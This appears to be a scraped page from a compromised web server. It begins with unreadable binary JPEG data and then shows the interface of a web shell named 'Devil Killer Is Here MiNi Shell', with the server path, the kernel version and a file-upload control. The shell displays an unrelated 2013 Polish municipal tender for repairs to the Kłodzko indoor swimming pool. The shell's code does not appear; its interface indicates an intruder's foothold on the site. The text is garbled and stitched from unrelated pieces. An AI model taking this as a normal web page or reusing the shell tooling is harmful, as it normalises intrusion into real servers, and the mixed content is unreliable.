JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/261610-N-2013.html

<p class="kh_header"><b>Kłodzko: Remont gwarancyjny krytej pływalni</b><br>
<b>Numer ogłoszenia: 261610 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont gwarancyjny krytej pływalni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są następujące roboty:
I.	Roboty budowlane:
1.	Likwidacja wilgoci na ścianach: w sali fitness, korytarzach oraz pomieszczeniach WC na poziomie - 1 poprzez: 
a)	Odsłonięcie ścian przyziemia do poziomu ław fundamentowych na głębokość 3,7 m na odcinku 50 mb. (3,7 m x 50 mb), wykonanie nowej izolacji pionowej na wysokości  3,7 m i długości 50 mb. (3,7 m x 50 mb.), zakrycie wykopów, przywrócenie ciągów pieszych  (50 mb. X 1,5 m) i drogi p.poż. (50 mb. x 4 m),
b)	Wymiana tynku wewnątrz pomieszczeń: w sali fitness  oraz korytarzach oraz pomieszczeniach WC na poziomie - 1 na odcinku 62 mb. i wysokości 1,5 m (62 mb. x 1,5 m),
c)	Malowanie ścian: w sali fitness oraz korytarzach oraz pomieszczeniach WC na poziomie - 1 na długości 62 mb. i wysokości 2,6 m (62 mb. x 2,6 m),
d)	Częściowa wymiana, udrożnienie i czyszczenie drenów odprowadzających wody gruntowe  od budynku na poziomie -1, położonych pod posadzką w sali fitness oraz korytarzach o długości 60 mb.  
2.	Ustabilizowanie i zabezpieczenie schodów zewnętrznych od strony zachodniej, odspajających się od ściany, poprzez odkopanie fundamentów schodów (4 mb. x 1,8 m), wykonanie wzmocnienia w postaci ławy z betonu (4 mb. x 1 m x 0,6 m), wykonanie izolacji poziomej (4 mb. x 1 m), wzmocnienie dodatkowymi kotwami połączenia konstrukcji schodów ze ścianą budynku (20 szt kotw). 
3.	Rozebranie i ułożenie na nowo ciągów pieszych z kostki brukowej, na odcinku 100 mb. i szerokości 1,5 m (100 mb. x 1,5 m) , zapadających się w stronę budynku pływalni, wykonanie dodatkowej izolacji pionowej ścian na odcinku dokonanej przekładki poprzez wykonanie wykopu 68 mb. (68 mb. x 1,2 m) oraz wykonanie izolacji pionowej na odcinku 68 mb. (68 mb. x 1,2 m).
4.	Usunięcie przecieków przez plażę z hali basenowej do pomieszczeń stacji uzdatniania wody, które zlokalizowane są w okolicy niecki basenu rekreacyjnego i niecki basenu do nauki pływania oraz w pomieszczeniach szatni poprzez wykonanie dodatkowych kratek ściekowych w ilości 4 sztuk oraz posadzki wraz ze spadkami o powierzchni 30 m2.
5.	Przemurowanie pęknięć ścian na wszystkich kondygnacjach o powierzchni 200 m2 wraz z wykonaniem nowych tynków i malowaniem o powierzchni 200 m2 . 
6.	Wymiana płytek podłogowych w holu szatni oraz na hali basenowej wraz                z wykonaniem izolacji poziomej o powierzchni 30 m2.
II.	Roboty instalacyjne:
1.	Likwidacja wycieku z sufitu na podbaseniu w pomieszczeniach konserwatorów i sprzątaczek w szatniach, sali fitness poprzez:
a)	Rozebranie posadzki w pomieszczeniach saun oraz szatni znajdujących się  na poziomie hali basenowej o powierzchni 45 m2, wykonanie nowej izolacji poziomej stropu, wykonanie  nowych spadków oraz 2 sztuk odpływów wody z szatni oraz natrysków usytuowanych przy saunach, ułożenie nowej posadzki o powierzchni 45 m2,
b)	Częściowa wymiana ogrzewania podłogowego w szatni o powierzchni 21 m2. 
2.	Uszczelnienie pęknięć niecek basenowych: basenu rekreacyjnego, basenu do nauki pływania oraz brodzika dla dzieci poprzez:
a)	Dokonanie uszczelnienia spękanego betonu metodą inekcji wstrzykiwania /na mokro miejsc przecieków/. Zlokalizowanych zostało 18 pęknięć o długości 9 mb.,
b)	Ściągnięcie płytek basenowych przy przelewie niecki brodzika na odcinku 7,5 mb. i szerokości 0,6 m, wykonanie nowej izolacji (7,5 mb. x 0,6 m), ułożenie płytek (7,5 mb x 0,6 m). 
3.	Usunięcie przecieków usytuowanych przy biczach wodnych , zainstalowanych w niecce basenu rekreacyjnego poprzez:
a)	Montaż osłon na rurze zjeżdżalni, kierujących strumień wody do przelewów znajdujących się przy basenie rekreacyjnym (6 mb. x 2 m), 
b)	Wymiana elementów metalowych wentylacji wraz z kratkami, które uległy korozji na skutek kontaktu z wodą basenową w ilości 2 szt. kratek nawiewowych + 4 mb rur.
4.	Usunięcie korozji zbiorników filtrów wykonanych ze stali nierdzewnej wraz z króćcami przyłączeniowymi - sztuk 4, poprzez: 
a)	Wykonanie izolacji zbiorników filtrów, poprzez wyłożenie od wewnątrz folią basenową zgrzewaną na gorąco 2 szt. zbiorników filtrów o wymiarach 4 m x 2 m x 2 m oraz dwóch sztuk o wymiarach 2 m x 1,5 m x 2 m.,
b)	Usunięcie wżerów oraz przecieków przy króćcach przyłączeniowych poprzez spawanie oraz ścianach bocznych zbiorników filtrów i dodatkowe zabezpieczenie farbą antykorozyjną ścian zewnętrznych i dna zbiorników (2 szt. x 4 m x 2 m x 2 m i 2 szt. x 2m x 1,5 m x 2 m).
5.	Wymiana dysz oraz osłon w wannie jacuzzi - sztuk 6.
6.	Dodatkowe wzmocnienie i mocowanie instalacji wod-kan i technologii uzdatniania wody na poziomie -1, poprzez wykonanie 34szt. kotw.
7.	Usunięcie nieszczelności instalacji wod-kan oraz technologii wody na poziomie -1.
8.	Wymiana zaczepów i reflektorów oświetlenia podwodnego w basenie rekreacyjnym - sztuk 5 o mocy 300 W każdy.
9.	Wymiana czterech dysz dzikiej rzeki o wydajności 240 m3 /h , wymiana dwóch pomp typu 3M65-160 / 7,5 o wydajności 120 m3/h/ sztuka i mocy 7,5 kW/ sztuka.
10.	Wymiana uszkodzonych pomp basenowych - sztuk 2, sygn. 3M65-125/5/5             o wydajności 125m3/h/ sztuka  i mocy 5,5kW /sztuka - jedna z falownikiem/.
11.	Wymiana elektrozaworu O 200 mm. przy filtrze B2 szt.1. 
12.	Wymiana generatora pary w łaźni parowej, moc: 10,8 kW, wydajność: 14,6 kg/godz. pary, bezobsługowy, szt.1.
13.	Wymiana drzwi w saunie suchej - 1 sztuka, w saunie parowej - 1 sztuka oraz drzwi p.poż - 1 sztuka w holu hali basenowej. 
14.	Przebudowa rozdzielni głównej - elektrycznej w celu usunięcia przegrzewania się rozdzielni oraz podłączenie klap p.poż.


Wszelkie zastosowane materiały i zamontowane urządzenia muszą posiadać atesty, certyfikaty i deklaracje zgodności. 
Roboty będą wykonywane przy ciągłości pracy krytej pływalni bez wyłączenia z eksploatacji. 
W związku z pracami remontowymi, które będą przeprowadzane na czynnym obiekcie krytej pływalni, Zamawiający zastrzega, iż część robót remontowych będzie wykonywana                         w godzinach nocnych tj. po zakończeniu godzin pracy krytej pływalni ( od 22.00 do 6.00 ). 
Zamawiający wymaga zachowania terminu wykonania robót - tj. 3 miesiące od daty rozpoczęcia prac remontowych.
W przypadku niewykonania w ustalonym terminie prac, Zamawiający będzie naliczać kary zgodnie z postanowieniami umowy, stanowiącej załącznik do SIWZ.
Wykonawca jest zobowiązany do ustalenia z Zamawiającym zakresu robót (harmonogram rzeczowo - finansowy) do wykonania przedmiotu zamówienia. Harmonogram musi uwzględniać wszelkie pojedyncze roboty zależne od siebie czasowo i założenia robocze dotyczące poszczególnych etapów robót.
Rozliczenia za media ( woda, ścieki, energia elektryczna ) nastąpią na podstawie opomiarowania poszczególnych mediów (wg. wskazań zainstalowanych przez wykonawcę urządzeń pomiarowych). Wykonawca zobowiązany jest do poniesienia kosztów związanych z napełnieniem wodą niecek basenów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.32.00.00-0, 45.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający ustala wadium w wysokości 16.000,00 zł brutto (słownie: szesnaście tysięcy złotych i 00/100 groszy);
2.	Wadium może być wniesione w formach przewidzianych w art. 45 ust 6 ustawy PZP. Wadium wniesione w pieniądzu Wykonawca wpłaca przelewem na rachunek Zamawiającego PBS w Strzelinie o Kłodzko -  28 9588 0004 7100 1010 2000 0050, z adnotacją Wadium - Remont gwarancyjny krytej pływalni. Jeżeli Wykonawca wnosi wadium w pieniądzu, musi je wpłacić odpowiednio wcześniej, tak aby znalazło się ono na koncie Zamawiającego przed datą i godziną składania ofert.
3.	Wadium wniesione w innych przewidzianych ustawą formach zamawiający składa wraz z ofertą. Termin wniesienia wadium w innych formach niż w pieniądzu upływa wraz z terminem składania ofert.
4.	Zasady zwrotu oraz zatrzymania wadium przez Zamawiającego określa art. 46 ustawy PZP.
5. Wykonawca, którego oferta nie będzie prawidłowo zabezpieczona wniesionym wadium zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony, jeżeli Wykonawca oświadczy, że spełnia w/w warunek na druku zał. nr 2.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich    
Wykonawców lub wszyscy Wykonawcy wspólnie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż:
Wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert,                  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 roboty  budowlane, polegające na budowie lub remoncie obiektu budowlanego - jedna robota o wartości nie mniejszej jak 150.000 zł (brutto) oraz robót instalacyjnych, sanitarnych na kwotę minimum 50.000 zł brutto.
 Wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania.
Wykonawca zobowiązany jest przedstawić dowody potwierdzające wykonanie                     robót w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych wraz z potwierdzeniem ich wartości. 
Dowodami, o których mowa są poświadczenia oraz w przypadku zamówień                    na roboty budowlane -inne dokumenty - jeżeli z uzasadnionych przyczyn                         o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń. 
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.  W niniejszym postępowaniu Wykonawca, w miejsce poświadczeń może przedkładać dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej  i ich prawidłowe ukończenie.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony, jeżeli Wykonawca oświadczy, że spełnia w/w warunek na druku zał. nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż:	dysponuje  osobami  zdolnymi do wykonania zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami na stanowisku kierownika budowy/robót posiadającymi stosowne uprawnienia do kierowania robotami, tj.: min. 1 kierownikiem budowy posiadającym uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń, min. 1 kierownikiem budowy posiadającym uprawnienia w specjalności elektrycznej bez ograniczeń oraz  min. 1 kierownikiem budowy posiadającym uprawnienia w zakresie instalacji sanitarnych bez ograniczeń obowiązujące na terenie Polski i/lub państw członkowskich UE (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na odstawie wcześniej obowiązujących przepisów).
        Oświadczenie, że osoby te posiadają właściwe uprawnienia i przynależą do Izby      
         Inżynierów Budownictwa lub odpowiedniej instytucji w przypadku Wykonawców z      
          krajów UE - należy dołączyć do oferty. W przypadku  wspólnego ubiegania się dwóch 
          lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich 
          łączny potencjał  osobowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż: Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  na kwotę minimum 300 000,00 zł. Należy załączyć dowód opłacenia polisy w przypadku płatności jednorazowej lub dowód opłacenia ostatniej raty w przypadku płatności                    w ratach, a w przypadku braku opłaconej polisy inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, powyższy warunek musi spełnić przynajmniej ten wykonawca, który będzie realizował zamówienie.  Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż:
Wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert,                  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 roboty  budowlane, polegające na budowie lub remoncie obiektu budowlanego - jedna robota o wartości nie mniejszej jak 150.000 zł (brutto) oraz robót instalacyjnych, sanitarnych na kwotę minimum 50.000 zł brutto.
 Wymagane doświadczenie zawodowe może wynikać z wykonania dwóch odrębnych robót budowlanych, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania.
Wykonawca zobowiązany jest przedstawić dowody potwierdzające wykonanie                     robót w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych wraz z potwierdzeniem ich wartości. 
Dowodami, o których mowa są poświadczenia oraz w przypadku zamówień                    na roboty budowlane -inne dokumenty - jeżeli z uzasadnionych przyczyn                         o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń. 
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.  W niniejszym postępowaniu Wykonawca, w miejsce poświadczeń może przedkładać dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej  i ich prawidłowe ukończenie.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dodatkowe:
1) Wypełniony formularz ofertowy + CENA OFERTY wzór stanowi załącznik nr 1
2) Zaakceptowany projekt umowy. Projekt umowy powinien zostać zaakceptowany bez dokonywania w nim jakichkolwiek zmian.
3) Do oferty należy dołączyć jako załącznik kosztorys ofertowy. 

B.2.7. Dokumenty przetargowe, które zostały otworzone w trakcie wykonywania procedury przetargowej zatrzymuje Zamawiający. Załączniki powinny zostać wypełnione (bądź przepisane z zachowaniem formy i treści) przez Wykonawcę bez dokonywania jakichkolwiek zmian skutkujących zmianą ich sensu.

B.2.8. Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia (np. konsorcja, spółki cywilne). W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wyboru oferty złożonej przez podmioty występujące wspólnie, podmioty te są obowiązane przed dniem zawarcia umowy w sprawie zamówienia publicznego przedłożyć Zamawiającemu umowę regulującą ich współpracę jako Wykonawców.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. W przypadku złożenia oferty wspólnej,                    w Formularzu oferty pełnomocnik zaznacza w czyim imieniu występuje. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.

